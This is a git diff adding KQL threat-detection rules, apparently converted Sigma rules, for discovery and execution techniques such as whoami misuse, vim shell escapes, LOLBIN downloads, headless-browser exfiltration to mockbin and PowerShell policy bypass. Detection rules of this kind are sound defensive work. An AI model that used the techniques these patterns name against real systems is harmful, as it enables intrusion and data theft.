attack.discovery, attack.t1049 + +DeviceProcessEvents +| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/Discovery/system_network_discovery_linux.kql new file mode 100644 index 00000000..0ea2b4b4 --- /dev/null +++ b/KQL/rules/Discovery/system_network_discovery_linux.kql @@ -0,0 +1,12 @@ +// Title: System Network Discovery - Linux +// Author: Ömer Günal and remotephone, oscd.community +// Date: 2020-10-06 +// Level: informational +// Description: Detects enumeration of local network configuration +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route") \ No newline at end of file diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/Discovery/system_network_discovery_macos.kql new file mode 100644 index 00000000..acb8edf8 --- /dev/null +++ b/KQL/rules/Discovery/system_network_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: System Network Discovery - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-06 +// Level: informational +// Description: Detects enumeration of local network configuration +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd")) \ No newline at end of file diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql new file mode 100644 index 00000000..8c788be5 --- /dev/null +++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql @@ -0,0 +1,13 @@ +// Title: Uncommon Connection to Active Directory Web Services +// Author: @kostastsale +// Date: 2024-01-26 +// Level: medium +// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 +// False Positives: +// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives. + +DeviceNetworkEvents +| where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql new file mode 100644 index 00000000..3ff984b5 --- /dev/null +++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql @@ -0,0 +1,14 @@ +// Title: Uncommon System Information Discovery Via Wmic.EXE +// Author: TropChaud +// Date: 2023-01-26 +// Level: medium +// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, +including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, +and GPU driver products/versions. +Some of these commands were used by Aurora Stealer in late 2022/early 2023. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 + +DeviceProcessEvents +| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql new file mode 100644 index 00000000..8c26bd44 --- /dev/null +++ b/KQL/rules/Discovery/use_of_w32tm_as_timer.kql @@ -0,0 +1,12 @@ +// Title: Use of W32tm as Timer +// Author: frack113 +// Date: 2022-09-25 +// Level: high +// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll") \ No newline at end of file diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql new file mode 100644 index 00000000..839b5d76 --- /dev/null +++ b/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: User Discovery And Export Via Get-ADUser Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 +// False Positives: +// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often + +DeviceProcessEvents +| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql new file mode 100644 index 00000000..b15c895f --- /dev/null +++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql @@ -0,0 +1,12 @@ +// Title: Vim GTFOBin Abuse - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-28 +// Level: high +// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. +Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 + +DeviceProcessEvents +| where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff")) \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/Discovery/whoami_as_parameter.kql new file mode 100644 index 00000000..5f1484b0 --- /dev/null +++ b/KQL/rules/Discovery/whoami_as_parameter.kql @@ -0,0 +1,10 @@ +// Title: WhoAmI as Parameter +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-29 +// Level: high +// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents +| where ProcessCommandLine contains ".exe whoami" \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql new file mode 100644 index 00000000..16cf3b82 --- /dev/null +++ b/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql @@ -0,0 +1,14 @@ +// Title: Whoami.EXE Execution Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-12 +// Level: medium +// Description: Detects the execution of whoami.exe with suspicious parent processes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment +// - Monitoring activity + +DeviceProcessEvents +| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql new file mode 100644 index 00000000..e765acfc --- /dev/null +++ b/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql @@ -0,0 +1,10 @@ +// Title: Whoami.EXE Execution With Output Option +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*" \ No newline at end of file diff --git a/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql new file mode 100644 index 00000000..dbd6c8f4 --- /dev/null +++ b/KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql @@ -0,0 +1,12 @@ +// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation +// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-12-23 +// Level: high +// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact +// False Positives: +// - Legitimate use of the library for administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql new file mode 100644 index 00000000..b0057dbd --- /dev/null +++ b/KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql @@ -0,0 +1,10 @@ +// Title: Abusable DLL Potential Sideloading From Suspicious Location +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-11 +// Level: high +// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql new file mode 100644 index 00000000..256d0222 --- /dev/null +++ b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql @@ -0,0 +1,12 @@ +// Title: Add Windows Capability Via PowerShell Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. + +DeviceProcessEvents +| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql new file mode 100644 index 00000000..cbcf3626 --- /dev/null +++ b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql @@ -0,0 +1,10 @@ +// Title: Adwind RAT / JRAT File Artifact +// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +// Date: 2017-11-10 +// Level: high +// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceFileEvents +| where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs") \ No newline at end of file diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/Execution/application_removed_via_wmic_exe.kql new file mode 100644 index 00000000..edd5d8c9 --- /dev/null +++ b/KQL/rules/Execution/application_removed_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Application Removed Via Wmic.EXE +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: Detects the removal or uninstallation of an application via "Wmic.EXE". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql new file mode 100644 index 00000000..4fdd3ae8 --- /dev/null +++ b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Application Terminated Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-11 +// Level: medium +// Description: Detects calls to the "terminate" function via wmic in order to kill an application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql new file mode 100644 index 00000000..da6e5306 --- /dev/null +++ b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql @@ -0,0 +1,12 @@ +// Title: Arbitrary Binary Execution Using GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: medium +// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Other parent binaries using GUP not currently identified + +DeviceProcessEvents +| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql new file mode 100644 index 00000000..dbd9319e --- /dev/null +++ b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary MSI Download Via Devinit.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http" \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql new file mode 100644 index 00000000..48bb255a --- /dev/null +++ b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms +// Author: Sreeman +// Date: 2020-03-13 +// Level: medium +// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. +// MITRE Tactic: Execution +// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access + +DeviceProcessEvents +| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel")) \ No newline at end of file diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql new file mode 100644 index 00000000..e24bcbd5 --- /dev/null +++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql @@ -0,0 +1,13 @@ +// Title: Assembly DLL Creation Via AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: medium +// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. + +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate assembly compilation using a build provider + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll") \ No newline at end of file diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/Execution/base64_mz_header_in_commandline.kql new file mode 100644 index 00000000..deff3393 --- /dev/null +++ b/KQL/rules/Execution/base64_mz_header_in_commandline.kql @@ -0,0 +1,12 @@ +// Title: Base64 MZ Header In CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: high +// Description: Detects encoded base64 MZ header in the commandline +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA" \ No newline at end of file diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/Execution/bash_interactive_shell.kql new file mode 100644 index 00000000..0d0ba1f4 --- /dev/null +++ b/KQL/rules/Execution/bash_interactive_shell.kql @@ -0,0 +1,10 @@ +// Title: Bash Interactive Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: low +// Description: Detects execution of the bash shell with the interactive flag "-i". +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains " -i " and FolderPath endswith "/bash" \ No newline at end of file diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql new file mode 100644 index 00000000..4b800d52 --- /dev/null +++ b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql @@ -0,0 +1,12 @@ +// Title: Binary Proxy Execution Via Dotnet-Trace.EXE +// Author: Jimmy Bayne (@bohops) +// Date: 2024-01-02 +// Level: medium +// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the utility in order to debug and trace a program. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll") \ No newline at end of file diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql new file mode 100644 index 00000000..94cd4f50 --- /dev/null +++ b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql @@ -0,0 +1,12 @@ +// Title: BPFtrace Unsafe Option Usage +// Author: Andreas Hunkeler (@Karneades) +// Date: 2022-02-11 +// Level: medium +// Description: Detects the usage of the unsafe bpftrace option +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 +// False Positives: +// - Legitimate usage of the unsafe option + +DeviceProcessEvents +| where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace" \ No newline at end of file diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql new file mode 100644 index 00000000..48d40c08 --- /dev/null +++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql @@ -0,0 +1,11 @@ +// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. + +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql new file mode 100644 index 00000000..fcbfc541 --- /dev/null +++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql @@ -0,0 +1,11 @@ +// Title: Capsh Shell Invocation - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "capsh" utility to invoke a shell. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh" \ No newline at end of file diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql new file mode 100644 index 00000000..59879370 --- /dev/null +++ b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql @@ -0,0 +1,12 @@ +// Title: Change PowerShell Policies to an Insecure Level +// Author: frack113 +// Date: 2021-11-01 +// Level: medium +// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrator scripts + +DeviceProcessEvents +| where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql new file mode 100644 index 00000000..b69a82b1 --- /dev/null +++ b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql @@ -0,0 +1,10 @@ +// Title: Chromium Browser Headless Execution To Mockbin Like Site +// Author: X__Junior (Nextron Systems) +// Date: 2023-09-11 +// Level: high +// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin") \ No newline at end of file diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql new file mode 100644 index 00000000..60294be8 --- /dev/null +++ b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql @@ -0,0 +1,10 @@ +// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location +// Author: X__Junior +// Date: 2025-01-20 +// Level: medium +// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents +| where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains 